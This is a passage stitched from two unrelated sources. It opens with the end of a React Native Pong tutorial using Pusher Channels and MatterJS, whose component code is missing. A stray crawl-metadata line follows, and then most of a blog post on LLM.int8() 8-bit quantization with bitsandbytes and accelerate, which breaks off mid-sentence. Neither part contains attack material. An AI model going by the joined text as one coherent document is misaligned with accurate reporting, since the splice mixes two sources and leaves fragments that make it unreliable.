render() { return ( <GameEngine style={styles.container} systems={[this.physics, this.movePlank]} entities={{ physics: { engine: engine, world: world }, pongBall: { body: ball, size: [BALL_SIZE, BALL_SIZE], renderer: Circle }, playerOnePlank: { body: plankOne, size: [PLANK_WIDTH, PLANK_HEIGHT], color: "#a6e22c", renderer: Box, xAdjustment: 30 }, playerTwoPlank: { body: plankTwo, size: [PLANK_WIDTH, PLANK_HEIGHT], color: "#7198e6", renderer: Box, type: "rightPlank", xAdjustment: -33 }, theCeiling: { body: topWall, size: [GAME_WIDTH, 10], color: "#f9941d", renderer: Box, yAdjustment: -30 }, theFloor: { body: bottomWall, size: [GAME_WIDTH, 10], color: "#f9941d", renderer: Box, yAdjustment: 58 }, theLeftWall: { body: leftWall, size: [5, GAME_HEIGHT], color: "#333", renderer: Box, xAdjustment: 0 }, theRightWall: { body: rightWall, size: [5, GAME_HEIGHT], color: "#333", renderer: Box, xAdjustment: 0 } }} > <View style={styles.scoresContainer}> <View style={styles.score}> <Text style={styles.scoreLabel}>{this.myPlankColor}</Text> <Text style={styles.scoreValue}> {this.state.myScore}</Text> </View> <View style={styles.score}> <Text style={styles.scoreLabel}>{this.opponentPlankColor}</Text> <Text style={styles.scoreValue}> {this.state.opponentScore}</Text> </View> </View> </GameEngine> ); }
Note that the xAdjustment and yAdjustment are mainly used for adjusting the x and y positions of the objects. This is because the formula (see src/components/Box.js) that we're using to calculate the x and y positions of the object doesn't accurately adjust it to where it needs to be. This results in the ball seemingly bumping into an invisible wall before it actually hits the plank, because of the difference between the actual position of the object in the world (as far as MatterJS is concerned) and where it's being rendered on the screen.
You can view the styles for the Game screen here.
Here’s the code for the Circle and Box components:
// src/components/Circle;
// src/components/Box;
At this point you can now run the app:
```shell
cd server
node server.js
./ngrok http 5000
cd ..
react-native run-android
```
Here are the steps that I used for testing the app:
- Login user “One” on Android device #1.
- Login user “Two” on Android device #2.
- Access the `/opponent-found` route from the browser. This should show an alert on both devices that an opponent was found.
- Access the `/start-game` route from the browser. This should start moving the ball.
At this point, the two players can now start moving their planks and play the game.
Conclusion
In this tutorial, you learned how to create a realtime game with React Native and Pusher Channels. Along the way, you also learned how to use the React Native Game Engine and MatterJS.
There’s a hard limit of 10 messages per second, which stopped us from really going all out with syncing the UI. But the game we created is actually acceptable in terms of performance.
You can find the code on this GitHub repo.
February 20, 2019
by Wern Ancheta | https://pusher.com/tutorials/react-native-pong-game | CC-MAIN-2021-25 | refinedweb | 4,526 | 50.53 |
Michael !
Try this script for the Arduino.
You should see an Arduino service start up, wait a bit - for some reason initialization of the com port takes a while on windows 7 64 bit - the delay is from the native dlls in the RXTXCom module
After about 8 or 10 seconds - flip over to the oscope and see if a analog trace on pin A0 is running...
The previous script takes about 20 seconds to start up on my system - this is all because of the way RXTXComm behaves on windows 7...
I've noticed Arduino IDE takes the same amount of time to start.
This happens:
That looks like - a lot of nothing ...
hmmm... try updating
help->about->I feel lucky
restart
try again - wait on the jython console for 20 seconds - if it starts up correctly you should see alot of debug logging scroll by in the java console
if it still "no-worky"
click the help->about->GroG, it no worky button
You'll be the first to test my new auto-send log & debug report system !
I'll try it again :)
Got the log file, thanks ...
it "looks" like the board is sending info back .. don't know why the oscope is not updating...
I'll have to look at this some more...
Okay :)
BTW, congratulations! your "no-worky" button worked. Cheers to that :D
Um ..
"Sort of work", I got your log file but it was 2 Megs of pin data coming from the Arduino :P ... not much else,, which I'm a little suprised about ... I thought it would be "everything"
It looks like stuff is working, its just not updating the display... try waiting on the jython page until, you begin to see data scroll by in the Java console.. if you've already done this, try it - but before you execute the script - go to the menu
System -> Logging -> Level -> INFO
This should clear out all the publishPin log statements - make note - you shouldn't see anything scrolling now...
There's no analog trace when I tried it again. (with the system-logging-level-info...) ,
But, I noticed a different value from the recent picture that I posted. The differences are:
the mean, min. the min from the recent picture shows 0.
Here's the pic:
HA !
It is working, you just have it off the scale !!!
You've got that pin tied to 5 Volts ;D
Untie it from 5 volts and just stick a wire in it - the wire gives it plenty of deviation, so you can see the trace... but @ 5 Volts its off the screen !
I'm looking into making the screen size as big as 1024 now ... thanks for finding that bug ;)
Figured it out!
The values are off the chart because the servo shield provides 2 pushbuttons connected to pins A1 and A0.
Do we have to really use the script? cause the pushbutton is permanent. Thus, A0 will just give us "off-the-charts" value XD
More available options are good
We can do it with or without script, however, your MRL will become more and more complex - because your going to add more devices and more functionality.
To initialize all that, its much more convienent use a script, some things like message routing is more challenging to do graphically.
I'm not suggesting we use our current Arduino script, obviously it doesn't currently work for your system...
No worries... I was just trying to make sure your Arduino will be responsive to "a script"...
Alright,
So do you have any free analog pins ? - Just restart and change the pin value in the script to a free pin - then you can use it as a valid sensor...
Also,
to move on... what does your robot do now? Can you attach a current PDE script your using for it? Does it drive around in a circle, bump into walls and try a different route?
Okay. I've tried it again but no luck. I've hit No Worky now :)
Finally it worked :)
Great - So let's get organized now...
At the bottom of your post you currently have a working OpenCV script, and now we have a working Arduino script, we will continue to build scripts around the Services independently - until we like the results - So add the Arduino under the OpenCV
e.g.
# OpenCV Script
# Purpose - initializing the OpenCV service and start color filtering & publishing of coordinates
# of the contours found
.....
# Arduino script
.... etc
# PID script
etc...
After that - the next step is getting them all to talk to one another ..
So it should look like this?( disregard th "/". Just to avoid confusion)
# /////////////////////////////////////////// OPENCV///////////////////////////////////////////////////////////
from java.lang import String
Right, I put #'s in front of the dividers - because these are comments in Python...
So to get off where you left, you just have to copy/paste the whole script in..
Still working on the Shield... I'll keep you posted..
Take your time :)
Servo Shield question..
Can you test the shield without MRL ?
E.g. can you drop the shield library in and test moving the pan/tilt kit ?
Can you post your Arduino Shield code you used to test the pan/tilt kit? I suspect it would be very similar to the example from the library...
I want to make sure we have a "controlled" test... such that we know the library, arduino, shield & servos work in at least one context ... then we can try them & the new service in MRL
Here's a code moving the pan/tilt servos using 2 potentiometers:
////////////////start of arduino code//////////////
#include <ServoControl.h>
Excellent, thank you ... that is very helpful - thanks for the video too
If a "picture says a 1000 words" a video says 30K words per seconds ;)
It seems a bit jittery and a bit flakey in response in the video ? Do the servo's brown-out (stop working when you move them too fast) ? Some of that could be that they might be underpowered.
What is your feelings regarding the control of the servos? What things have you noticed?
Servos are not the problem :) It's jittery because of the potentiometers I used. My wirings are not stable. Thus, giving an unstable values. :)
BTW, how's the progress? are we near completion? I'm so excited cause when we accomplished this project, there's infinite of possiblities we can make in the future.
After accomplishing this, I am thinking of a robot arm that tracks a color so we can apply this project and grab that object when the desired distance between the object is met. Is this possible? :))
Ok, the more unstable the lower levels are (hardware & connection) - the more difficult it is to track (just so you know), it's always best to attempt to filter out noise at its source, rather than make software that compensates...
Progress is good, in that I know how I want to implement this, additionally, it will be helpful that you have a controlled way of moving the servos - so we can compare..
Still have a bit to do... and I have other responsibilities too :)
but I'm trying to get done..
Sure its all possible,
If I could get done with this I could start working on the 3D Point Cloud SLAM with a kinect :D which would give a robot a 3D map to navigate through
I posted the GlueAndBrains Python script and MRLComm2 script in your post.
I suggest try the following :
If something flakey happens I would recommend at some point - downloading the latest (complete package) as your post illustrates, should be intermediate.777.20120908.2154 or later
I can't test this obviously since I don't have the hardware.... :)
Good Luck...
Umm. There's a problem :(
I've uploaded the arduino code, updated the MRL, ran the jython script but there's no movement at all.
the opencv service seems working correctly because it only tracks one color. Here's a screenshot:
And, I just have a question:
The Arduino did not come up - not sure why....
The details of which servo are not in the Arduino code, but are now in the Python...
Specifically, it's in the Python shield code...
Looking at your log file now - can you try just the Arduino's Python, I would expect to see a tab after you run it...
I've sent you another logfile :))
I tried and ran it again. The arduino tab opened. Unfortunately, it does not work again :(
Here's a pic:
Hmmm.. don't see any ERRORs in that one...
In the future, don't put in the OpenCV stuff ... let's isolate it to the Arduino & Shield only...
I think that's the best step for now since the OpenCV is running properly. In isolating the arduino and shield, we can specifically determine the problem.
BTW, I don't know if I asked this question already. My question is, can we directly send the x,y values to the arduino via serial and there we will just map the values? But it's good to have a specific service for us to control the servos in the servo shield.
When you start the arduino and shield only.. does the analog trace come up on the oscope as before?
Yes it does :)
Here's a pic for confirmation:
That's good,
There are no ERRORs in the log - (thanks for the new one)...
I did noticed .. shield.start() was getting twice, so I removed the second call, and removed a servo just to reduce complexity.
So the python script now is edited and I should try it again isn't it? :))
Yes,
Make sure you don't have any updates with the "bleeding edge button"
Then give it a try with the new Jython script (leave OpenCV out of again)
what do you mean about : leave OpenCV out of again?
I tried the new script but it isn't working. The thing is, the servos are jittering but not as close to the position of the color.
BTW, I do have a realization about how the pan/tilt are tracking color. Isn't that, for example:
The color have the coordinates 160,150. Then, the servos are going to position based on the x,y coordinates mapped to 500-2400 uS. At the time that the color is set on the center of the camera based on the coordinates, say for example, it's coordinates will be now 90,90 (but the real position of the color is at 160,150) So, the servos will follow the 90,90 coordinates and the color will now be out of line of sight.
Is this problem is resolved by using PID?
Sorry, I've been studying PID since yesterday :))
For me, the best step for now is to verify Aceduino Shield service runs successfully. In order to that, can we try to use the scrollbar/trackbar in the service to position the desired servo?
"what do you mean about :
"what do you mean about : leave OpenCV out of it again?" <- I mean when you run the Python script just use from the # //////////////////////////////////////////////////////////////// ARDUINO ///////////////////////////////////////////////////////////
down.... don't copy in the OpenCV part
"I tried the new script but it isn't working. The thing is, the servos are jittering but not as close to the position of the color."
Really? This might be a case of it working when you think it's not :P - At this point I don't expect it to follow the color target. I want to validate the shield is working with the Arduino and Shield service.
This is the key part of the code:
This key part of the code somehow actually works!:
Great news !
Can you give me more info ?
Can you give me the steps involved now in making this work ?
If you shut it down, can you restart & get it to behave correctly again ? consistently ?
Last night it worked properly as the key part of the code states. But when I tried it again today, servo port 7 (as stated in the code) don't move :(
Servo port 7 is to be used right? I'll try it again today and post some results later. I will try to work it again.
I will send you a logfile now to verify the script's working :)
These should be your steps :
Is this key part of the script runs for a loop? cause I noticed (hopefully) some movements like it goes for 90 degrees then about 150 degress then nothing.
this key part I'm referring to:
It sounds like its working !
It's not a loop !
Just keep adding stuff .... I just wanted confirmation that it has control of the servo.
To put it in a for loop do the following,
this should move the servo from position 0 to 90 to 180 then back to 0 for 30 times.
Careful of the indentation.. Python is very picky when it comes to the code lining up.
Do I have to add it in the main aceduino shield code?
I have made getting to our position in color tracking much easier.
You will need to download the full zip (do not just update throught the bleeding edge button). This is necessary because contents of the repository have changed.
Once you have downloaded it and unzipped it - right-click -> install AceduinoMotorShield
This will download all the necessary components for the ACEduino motor shield to work (I hope :) ....
Including, downloading the Aceduino motor shield library, and putting it in the correct place.
Pretty cool, huh ?
Now in the jython's service tab is the script we are working on .
You can remove the OpenCV part - to make it simpler.
When you execute it should start an Arduino & ACEduinoMotorShield.
Additionally, the Arduino service now comes with examples -
a MRLComm example which is basic arduino communication without any shield libraries
and now ACEduinoMotorShield (soon to have AdafruitMotorShield too)
Can I directly upload the AceuinoMotorShield.ino now in the arduino service?:)
You "should" be able too...
You "should" be able too... It's still a little flakey, but I'm refactoring as quickly as I can :)
It's no work GroG. However, I've sent you the logfile now :)
I think we should just resort to using the Original Servo lib. For now, I will not use the servoshield.
Fortunately, it has 2 digital sensor pins(2,3) that can be used as ports for pan/tilt kit (perfect!). 1 port have I/O (can be used as input for the servo) GND, and Power supply.
I'm sorry for the time you wasted in adapting the aceduino motor shield to MRL. I'm still hoping that we can accomplish this project :))
Not time wasted,
just getting closer to borg'ing in another piece of hardware ;) !
Anyway, if your going to use the regular Servo library then you need to upload - the original MRLComm.ino
It's the Arduino ino which comes loaded by default in the Arduino editor - please try the following and tell me the results :
Good luck
GroG it's working now! :)
However, it's not running in a loop. The servos just run as what the script's written.
Let's try now the full script :)
Please change the servo script cause it's still in the loop :) | http://myrobotlab.org/content/color-tracking-mrl-using-opencv-jython-and-arduino-services | CC-MAIN-2019-47 | refinedweb | 2,791 | 81.53 |
A Gentle Introduction to 8-bit Matrix Multiplication for transformers at scale using Hugging Face Transformers, Accelerate and bitsandbytes
Introduction
Language models are becoming larger all the time. At the time of this writing, PaLM has 540B parameters, OPT, GPT-3, and BLOOM have around 176B parameters, and we are trending towards even larger models. Below is a diagram showing the size of some recent language models.
Therefore, these models are hard to run on easily accessible devices. For example, just to do inference on BLOOM-176B, you would need to have 8x 80GB A100 GPUs (~$15k each). To fine-tune BLOOM-176B, you'd need 72 of these GPUs! Much larger models, like PaLM would require even more resources.
Because these huge models require so many GPUs to run, we need to find ways to reduce these requirements while preserving the model's performance. Various technologies have been developed that try to shrink the model size, you may have heard of quantization and distillation, and there are many others.
After completing the training of BLOOM-176B, we at HuggingFace and BigScience were looking for ways to make this big model easier to run on fewer GPUs. Through our BigScience community we were made aware of research on Int8 inference that does not degrade predictive performance of large models and reduces their memory footprint by a factor of 2x. Soon we started collaborating on this research, which ended with a full integration into Hugging Face `transformers`. With this blog post, we offer LLM.int8() integration for all Hugging Face models, which we explain in more detail below. If you want to read more about our research, you can read our paper, LLM.int8(): 8-bit Matrix Multiplication for Transformers at Scale.
This article focuses on giving a high-level overview of this quantization technology, outlining the difficulties in incorporating it into the `transformers` library, and drawing up the long-term goals of this partnership.
Here you will learn what exactly makes a large model use so much memory. What makes BLOOM 350GB? Let's begin by gradually going over a few basic premises.
Common data types used in Machine Learning
We start with the basic understanding of different floating point data types, which are also referred to as "precision" in the context of Machine Learning.
The size of a model is determined by the number of its parameters, and their precision, typically one of float32, float16 or bfloat16 (image below from:).
Float32 (FP32) stands for the standardized IEEE 32-bit floating point representation. With this data type it is possible to represent a wide range of floating numbers. In FP32, 8 bits are reserved for the "exponent", 23 bits for the "mantissa" and 1 bit for the sign of the number. In addition to that, most of the hardware supports FP32 operations and instructions.
In the float16 (FP16) data type, 5 bits are reserved for the exponent and 10 bits are reserved for the mantissa. This makes the representable range of FP16 numbers much lower than FP32. This exposes FP16 numbers to the risk of overflowing (trying to represent a number that is very large) and underflowing (representing a number that is very small).
For example, if you do `10k * 10k` you end up with `100M`, which is not possible to represent in FP16, as the largest number possible is `64k`. And thus you'd end up with `NaN` (Not a Number) results, and if you have sequential computation like in neural networks, all the prior work is destroyed.
Usually, loss scaling is used to overcome this issue, but it doesn't always work well.
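This overflow behavior is easy to see directly; here is a quick NumPy illustration (not part of the original post):

```python
import numpy as np

# FP16's largest representable value is 65504, so 10_000 * 10_000
# (= 100M) overflows to infinity.
with np.errstate(over="ignore"):
    product = np.float16(10_000) * np.float16(10_000)

print(np.finfo(np.float16).max)  # 65504.0
print(product)                   # inf
```

In BF16 (or FP32) the same product stays finite, because those formats keep the wider 8-bit exponent range.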
A new format, bfloat16 (BF16), was created to avoid these constraints. In BF16, 8 bits are reserved for the exponent (which is the same as in FP32) and 7 bits are reserved for the fraction.
This means that in BF16 we can retain the same dynamic range as FP32. But we lose 3 bits of precision. Now there is absolutely no problem with huge numbers, but the precision is worse than FP16 here.
In the Ampere architecture, NVIDIA also introduced TensorFloat-32 (TF32) precision format, combining the dynamic range of BF16 and precision of FP16 to only use 19 bits. It's currently only used internally during certain operations.
In the machine learning jargon FP32 is called full precision (4 bytes), while BF16 and FP16 are referred to as half-precision (2 bytes). On top of that, the int8 (INT8) data type consists of an 8-bit representation that can store 2^8 different values (between [0, 255] or [-128, 127] for signed integers).
While ideally the training and inference should be done in FP32, it is two times slower than FP16/BF16, and therefore a mixed precision approach is used where the weights are held in FP32 as a precise "main weights" reference, while computations in the forward and backward passes are done in FP16/BF16 to enhance training speed. The FP16/BF16 gradients are then used to update the FP32 main weights.
During training, the main weights are always stored in FP32, but in practice, the half-precision weights often provide similar quality during inference as their FP32 counterpart -- a precise reference of the model is only needed when it receives multiple gradient updates. This means we can use the half-precision weights and use half the GPUs to accomplish the same outcome.
To calculate the model size in bytes, one multiplies the number of parameters by the size of the chosen precision in bytes. For example, if we use the bfloat16 version of the BLOOM-176B model, we have `176*10**9 x 2 bytes = 352GB`! As discussed earlier, this is quite a challenge to fit into a few GPUs.
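As a quick sanity check, this arithmetic is easy to script (illustrative only):

```python
# Model size = number of parameters x bytes per parameter.
n_params = 176 * 10**9  # BLOOM-176B

for name, bytes_per_param in [("fp32", 4), ("fp16/bf16", 2), ("int8", 1)]:
    size_gb = n_params * bytes_per_param / 10**9
    print(f"{name}: {size_gb:.0f} GB")
# fp32: 704 GB, fp16/bf16: 352 GB, int8: 176 GB
```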
But what if we can store those weights with less memory using a different data type? A methodology called quantization has been used widely in Deep Learning.
Introduction to model quantization
Experimentally, we have discovered that instead of using the 4-byte FP32 precision, we can get an almost identical inference outcome with 2-byte BF16/FP16 half-precision, which halves the model size. It'd be amazing to cut it further, but the inference quality outcome starts to drop dramatically at lower precision.
To remediate that, we introduce 8-bit quantization. This method uses a quarter precision, thus needing only 1/4th of the model size! But it's not done by just dropping another half of the bits.
Quantization is done by essentially “rounding” from one data type to another. For example, if one data type has the range 0..9 and another 0..4, then the value “4” in the first data type would be rounded to “2” in the second data type. However, if we have the value “3” in the first data type, it lies between 1 and 2 of the second data type, then we would usually round to “2”. This shows that both values “4” and “3” of the first data type have the same value “2” in the second data type. This highlights that quantization is a noisy process that can lead to information loss, a sort of lossy compression.
The two most common 8-bit quantization techniques are zero-point quantization and absolute maximum (absmax) quantization. Zero-point quantization and absmax quantization map the floating point values into more compact int8 (1 byte) values. First, these methods normalize the input by scaling it by a quantization constant.
For example, in zero-point quantization, if my range is -1.0…1.0 and I want to quantize into the range -127…127, I want to scale by the factor of 127 and then round into the 8-bit precision. To retrieve the original value, you would need to divide the int8 value by that same quantization factor of 127. For example, the value 0.3 would be scaled to `0.3*127 = 38.1`. Through rounding, we get the value of 38. If we reverse this, we get `38/127 = 0.2992` – we have a quantization error of about 0.0008 in this example. These seemingly tiny errors tend to accumulate and grow as they get propagated through the model’s layers and result in performance degradation.
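The rounding step above can be sketched in a couple of lines (this shows only the scaling/rounding part; a full zero-point scheme also shifts by a zero-point offset for asymmetric ranges):

```python
SCALE = 127.0  # maps the range -1.0...1.0 onto -127...127

def quantize(x: float) -> int:
    """Scale to the int8 range and round."""
    return round(x * SCALE)

def dequantize(q: int) -> float:
    return q / SCALE

q = quantize(0.3)   # 0.3 * 127 = 38.1 -> 38
x = dequantize(q)   # 38 / 127 = 0.2992...
print(q, x, abs(0.3 - x))  # error is roughly 0.0008
```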
(Image taken from: this blogpost )
Now let's look at the details of absmax quantization. To calculate the mapping between the fp16 number and its corresponding int8 number in absmax quantization, you have to first divide by the absolute maximum value of the tensor and then multiply by the total range of the data type.
For example, let's assume you want to apply absmax quantization in a vector that contains `[1.2, -0.5, -4.3, 1.2, -3.1, 0.8, 2.4, 5.4]`. You extract the absolute maximum of it, which is `5.4` in this case. Int8 has a range of `[-127, 127]`, so we divide 127 by `5.4` and obtain `23.5` for the scaling factor. Therefore multiplying the original vector by it gives the quantized vector `[28, -12, -101, 28, -73, 19, 56, 127]`.
To retrieve the original values, one can divide the int8 numbers by the quantization factor in full precision, but since the results above were rounded, some precision will be lost.
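Here is the same absmax worked example in NumPy (an illustrative sketch):

```python
import numpy as np

x = np.array([1.2, -0.5, -4.3, 1.2, -3.1, 0.8, 2.4, 5.4], dtype=np.float32)

# Scale factor = int8 max / absolute maximum of the tensor.
scale = 127 / np.max(np.abs(x))              # 127 / 5.4, about 23.5
x_int8 = np.round(x * scale).astype(np.int8)
print(x_int8)  # [  28  -12 -101   28  -73   19   56  127]

# Dequantize by dividing with the same factor; the rounding error remains.
x_dequant = x_int8 / scale
print(np.max(np.abs(x - x_dequant)))
```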
For an unsigned int8, we would subtract the minimum and scale by the absolute maximum. This is close to what zero-point quantization does. It is similar to min-max scaling, but the latter maintains the value scales in such a way that the value “0” is always represented by an integer without any quantization error.
These tricks can be combined in several ways, for example, row-wise or vector-wise quantization, when it comes to matrix multiplication for more accurate results. Looking at the matrix multiplication, A*B=C, instead of regular quantization that normalizes by an absolute maximum value per tensor, vector-wise quantization finds the absolute maximum of each row of A and each column of B. Then we normalize A and B by dividing by these vectors. We then multiply A*B to get C. Finally, to get back the FP16 values, we denormalize by computing the outer product of the absolute maximum vectors of A and B. More details on this technique can be found in the LLM.int8() paper or in the blog post about quantization and emergent features on Tim's blog.
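A minimal NumPy sketch of vector-wise quantized matrix multiplication may make this concrete (row-wise scales for A, column-wise scales for B; this is an illustration of the idea, not the optimized bitsandbytes kernel):

```python
import numpy as np

def vectorwise_int8_matmul(A, B):
    ca = np.max(np.abs(A), axis=1, keepdims=True)  # absmax per row of A
    cb = np.max(np.abs(B), axis=0, keepdims=True)  # absmax per column of B

    A8 = np.round(A / ca * 127).astype(np.int8)
    B8 = np.round(B / cb * 127).astype(np.int8)

    # Accumulate in int32, then denormalize with the outer product of scales.
    C32 = A8.astype(np.int32) @ B8.astype(np.int32)
    return C32 * (ca * cb) / (127 * 127)

rng = np.random.default_rng(0)
A = rng.normal(size=(4, 8)).astype(np.float32)
B = rng.normal(size=(8, 4)).astype(np.float32)

err = np.max(np.abs(vectorwise_int8_matmul(A, B) - A @ B))
print(err)  # small compared to the entries of A @ B
```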
While these basic techniques enable us to quantize Deep Learning models, they usually lead to a drop in accuracy for larger models. The LLM.int8() implementation that we integrated into the Hugging Face Transformers and Accelerate libraries is the first technique that does not degrade performance even for large models with 176B parameters, such as BLOOM.
A gentle summary of LLM.int8(): zero degradation matrix multiplication for Large Language Models
In LLM.int8(), we have demonstrated that it is crucial to comprehend the scale-dependent emergent properties of transformers in order to understand why traditional quantization fails for large models. We demonstrate that performance deterioration is caused by outlier features, which we explain in the next section. The LLM.int8() algorithm itself can be explained as follows.
In essence, LLM.int8() seeks to complete the matrix multiplication computation in three steps:
- From the input hidden states, extract the outliers (i.e. values that are larger than a certain threshold) by column.
- Perform the matrix multiplication of the outliers in FP16 and the non-outliers in int8.
- Dequantize the non-outlier results and add both outlier and non-outlier results together to receive the full result in FP16.
These steps can be summarized in the following animation:
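In code, the three steps might be sketched like this (a simplified NumPy illustration of the decomposition, not the actual CUDA kernels in bitsandbytes; it reuses the vector-wise absmax quantization described above):

```python
import numpy as np

def llm_int8_matmul(X, W, threshold=6.0):
    """Mixed int8/fp decomposition: outlier feature dimensions stay in
    higher precision, everything else goes through int8."""
    # 1. Extract outlier feature dimensions: columns of X containing any
    #    value with magnitude at or above the threshold.
    outliers = np.any(np.abs(X) >= threshold, axis=0)

    # 2a. Outlier part: ordinary higher-precision matmul.
    C_out = X[:, outliers] @ W[outliers, :]

    # 2b. Non-outlier part: vector-wise int8 quantization and matmul.
    Xs, Ws = X[:, ~outliers], W[~outliers, :]
    sx = np.max(np.abs(Xs), axis=1, keepdims=True) + 1e-8  # row scales
    sw = np.max(np.abs(Ws), axis=0, keepdims=True) + 1e-8  # column scales
    X8 = np.round(Xs / sx * 127).astype(np.int8)
    W8 = np.round(Ws / sw * 127).astype(np.int8)
    C_int8 = (X8.astype(np.int32) @ W8.astype(np.int32)) * (sx * sw) / 127**2

    # 3. Dequantized non-outlier result + outlier result.
    return C_out + C_int8

rng = np.random.default_rng(1)
X = rng.normal(size=(4, 16)).astype(np.float32)
X[:, 3] = np.array([8.0, -9.5, 12.0, -7.25], dtype=np.float32)  # outlier dim
W = rng.normal(size=(16, 8)).astype(np.float32)

err = np.max(np.abs(llm_int8_matmul(X, W) - X @ W))
print(err)  # close to the exact result despite 8-bit storage
```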
The importance of outlier features
A value that is outside the range of some numbers' global distribution is generally referred to as an outlier. Outlier detection has been widely used and covered in the current literature, and having prior knowledge of the distribution of your features helps with the task of outlier detection. More specifically, we have observed that classic quantization at scale fails for transformer-based models >6B parameters. While large outlier features are also present in smaller models, we observe that beyond a certain threshold these outliers form highly systematic patterns across transformers, appearing in every layer of the transformer. For more details on these phenomena see the LLM.int8() paper and emergent features blog post.
As mentioned earlier, 8-bit precision is extremely constrained, therefore quantizing a vector with several big values can produce wildly erroneous results. Additionally, because of a built-in characteristic of the transformer-based architecture that links all the elements together, these errors tend to compound as they get propagated across multiple layers. Therefore, mixed-precision decomposition has been developed to facilitate efficient quantization with such extreme outliers. It is discussed next.
Inside the MatMul
Once the hidden states are computed we extract the outliers using a custom threshold and we decompose the matrix into two parts as explained above. We found that extracting all outliers with magnitude 6 or greater in this way recovers full inference performance. The outlier part is done in fp16 so it is a classic matrix multiplication, whereas the 8-bit matrix multiplication is done by quantizing the weights and hidden states into 8-bit precision using vector-wise quantization -- that is, row-wise quantization for the hidden state and column-wise quantization for the weight matrix. After this step, the results are dequantized and returned in half-precision in order to add them to the first matrix multiplication.
What does 0 degradation mean?
How can we properly evaluate the performance degradation of this method? How much quality do we lose in terms of generation when using 8-bit models?
We ran several common benchmarks with the 8-bit and native models using lm-eval-harness and reported the results.
For OPT-175B:
For BLOOM-176B:
We indeed observe 0 performance degradation for those models since the absolute differences of the metrics are all below the standard error (except for BLOOM-int8, which is slightly better than the native model on lambada). For a more detailed performance evaluation against state-of-the-art approaches, take a look at the paper!
Is it faster than native models?
The main purpose of the LLM.int8() method is to make large models more accessible without performance degradation. But the method would be less useful if it is very slow. So we benchmarked the generation speed of multiple models. We find that BLOOM-176B with LLM.int8() is about 15% to 23% slower than the fp16 version – which is still quite acceptable. We found larger slowdowns for smaller models, like T5-3B and T5-11B. We worked hard to speed up these small models. Within a day, we could improve inference per token from 312 ms to 173 ms for T5-3B and from 45 ms to 25 ms for T5-11B. Additionally, issues were already identified, and LLM.int8() will likely be faster still for small models in upcoming releases. For now, the current numbers are in the table below.
The 3 models are BLOOM-176B, T5-11B and T5-3B.
Hugging Face `transformers` integration nuances
Next let's discuss the specifics of the Hugging Face `transformers` integration. Let's look at the usage and the common culprit you may encounter while trying to set things up.
Usage
The module responsible for the whole magic described in this blog post is called `Linear8bitLt` and you can easily import it from the `bitsandbytes` library. It is derived from a classic `torch.nn` Module and can be easily used and deployed in your architecture with the code described below.
Here is a step-by-step example of the following use case: let's say you want to convert a small model to int8 using `bitsandbytes`.
- First we need the correct imports below!
```python
import torch
import torch.nn as nn

import bitsandbytes as bnb
from bitsandbytes.nn import Linear8bitLt
```
- Then you can define your own model. Note that you can convert a checkpoint or model of any precision to 8-bit (FP16, BF16 or FP32) but, currently, the input of the model has to be FP16 for our Int8 module to work. So we treat our model here as a fp16 model.
fp16_model = nn.Sequential( nn.Linear(64, 64), nn.Linear(64, 64) )
- Let's say you have trained your model on your favorite dataset and task! Now time to save the model:
[... train the model ...] torch.save(fp16_model.state_dict(), "model.pt")
- Now that your
state_dictis saved, let us define an int8 model:
int8_model = nn.Sequential( Linear8bitLt(64, 64, has_fp16_weights=False), Linear8bitLt(64, 64, has_fp16_weights=False) )
Here it is very important to add the flag
has_fp16_weights. By default, this is set to
True which is used to train in mixed Int8/FP16 precision. However, we are interested in memory efficient inference for which we need to use
has_fp16_weights=False.
- Now time to load your model in 8-bit!
int8_model.load_state_dict(torch.load("model.pt")) int8_model = int8_model.to(0) # Quantization happens here
Note that the quantization step is done in the second line once the model is set on the GPU. If you print
int8_model[0].weight before calling the
.to function you get:
int8_model[0].weight Parameter containing: tensor([[ 0.0031, -0.0438, 0.0494, ..., -0.0046, -0.0410, 0.0436], [-0.1013, 0.0394, 0.0787, ..., 0.0986, 0.0595, 0.0162], [-0.0859, -0.1227, -0.1209, ..., 0.1158, 0.0186, -0.0530], ..., [ 0.0804, 0.0725, 0.0638, ..., -0.0487, -0.0524, -0.1076], [-0.0200, -0.0406, 0.0663, ..., 0.0123, 0.0551, -0.0121], [-0.0041, 0.0865, -0.0013, ..., -0.0427, -0.0764, 0.1189]], dtype=torch.float16)
Whereas if you print it after the second line's call you get:
int8_model[0].weight Parameter containing: tensor([[ 3, -47, 54, ..., -5, -44, 47], [-104, 40, 81, ..., 101, 61, 17], [ -89, -127, -125, ..., 120, 19, -55], ..., [ 82, 74, 65, ..., -49, -53, -109], [ -21, -42, 68, ..., 13, 57, -12], [ -4, 88, -1, ..., -43, -78, 121]], device='cuda:0', dtype=torch.int8, requires_grad=True)
The weights values are "truncated" as we have seen when explaining quantization in the previous sections. Also, the values seem to be distributed between [-127, 127]. You might also wonder how to retrieve the FP16 weights in order to perform the outlier MatMul in fp16? You can simply do:
(int8_model[0].weight.CB * int8_model[0].weight.SCB) / 127
And you will get:
tensor([[ 0.0028, -0.0459, 0.0522, ..., -0.0049, -0.0428, 0.0462], [-0.0960, 0.0391, 0.0782, ..., 0.0994, 0.0593, 0.0167], [-0.0822, -0.1240, -0.1207, ..., 0.1181, 0.0185, -0.0541], ..., [ 0.0757, 0.0723, 0.0628, ..., -0.0482, -0.0516, -0.1072], [-0.0194, -0.0410, 0.0657, ..., 0.0128, 0.0554, -0.0118], [-0.0037, 0.0859, -0.0010, ..., -0.0423, -0.0759, 0.1190]], device='cuda:0')
Which is close enough to the original FP16 values (2 print outs up)!
- Now you can safely infer using your model by making sure your input is on the correct GPU and is in FP16:
input_ = torch.randn(64, dtype=torch.float16) hidden_states = int8_model(input_.to(torch.device('cuda', 0)))
As a side note, you should be aware that these modules differ slightly from the
nn.Linear modules in that their parameters come from the
bnb.nn.Int8Params class rather than the
nn.Parameter class. You'll see later that this presented an additional obstacle on our journey!
Now the time has come to understand how to integrate that into the
transformers library!
accelerate is all you need
When working with huge models, the
accelerate library includes a number of helpful utilities. The
init_empty_weights method is especially helpful because any model, regardless of size, may be initialized with this method as a context manager without allocating any memory for the model weights.
import torch.nn as nn from accelerate import init_empty_weights with init_empty_weights(): model = nn.Sequential([nn.Linear(100000, 100000) for _ in range(1000)]) # This will take ~0 RAM!
The initialized model will be put on PyTorch's
meta device, an underlying mechanism to represent shape and dtype without allocating memory for storage. How cool is that?
Initially, this function is called inside the
.from_pretrained function and overrides all parameters to
torch.nn.Parameter. This would not fit our requirement since we want to keep the
Int8Params class in our case for
Linear8bitLt modules as explained above. We managed to fix that on the following PR that modifies:
module._parameters[name] = nn.Parameter(module._parameters[name].to(torch.device("meta")))
to
